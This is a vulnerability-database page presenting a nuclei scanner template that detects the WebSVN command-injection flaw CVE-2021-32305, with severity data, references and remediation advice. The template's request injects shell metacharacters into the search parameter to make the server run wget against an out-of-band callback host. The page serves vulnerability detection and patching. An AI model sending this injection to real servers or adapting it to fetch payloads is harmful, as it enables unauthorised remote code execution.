Lucene search
K

Websvn <2.6.1 - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 68 Views

Websvn <2.6.1 - Remote Code Execution vulnerability allows attackers to execute arbitrary commands via shell metacharacters in the search parameter. Upgrade to version 2.6.1 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Websvn 2.6.0 - Remote Code Execution (Unauthenticated) Exploit
21 Jun 202100:00
zdt
GithubExploit
Exploit for CVE-2021-3205
26 Dec 202320:20
githubexploit
GithubExploit
Exploit for OS Command Injection in Websvn
26 Dec 202320:20
githubexploit
ATTACKERKB
CVE-2021-32305
18 May 202100:00
attackerkb
ArchLinux
[ASA-202105-16] websvn: arbitrary command execution
25 May 202100:00
archlinux
Circl
CVE-2021-32305
21 Jun 202100:00
circl
CNNVD
websvn 操作系统命令注入漏洞
18 May 202100:00
cnnvd
Check Point Advisories
WebSVN Remote Code Execution (CVE-2021-32305)
31 Aug 202100:00
checkpoint_advisories
CVE
CVE-2021-32305
18 May 202116:11
cve
Cvelist
CVE-2021-32305
18 May 202116:11
cvelist
Rows per page
id: CVE-2021-32305

info:
  name: Websvn <2.6.1 - Remote Code Execution
  author: gy741
  severity: critical
  description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://github.com/websvnphp/websvn/pull/142
    - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32305
    cwe-id: CWE-78
    epss-score: 0.86716
    epss-percentile: 0.99718
    cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: websvn
    product: websvn
  tags: cve,cve2021,websvn,rce,oast,packetstorm,vkev,vuln

http:
  - raw:
      - |
        GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022028876d92e0b1b0cc8693db2128ce8814cb200648e9540312aeb62f66946be195022100d17892ff745da0876de21a82537e3d697430c3bec3b8ef2fa675e7f335d0fefd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
CVSS 210
EPSS0.86716
68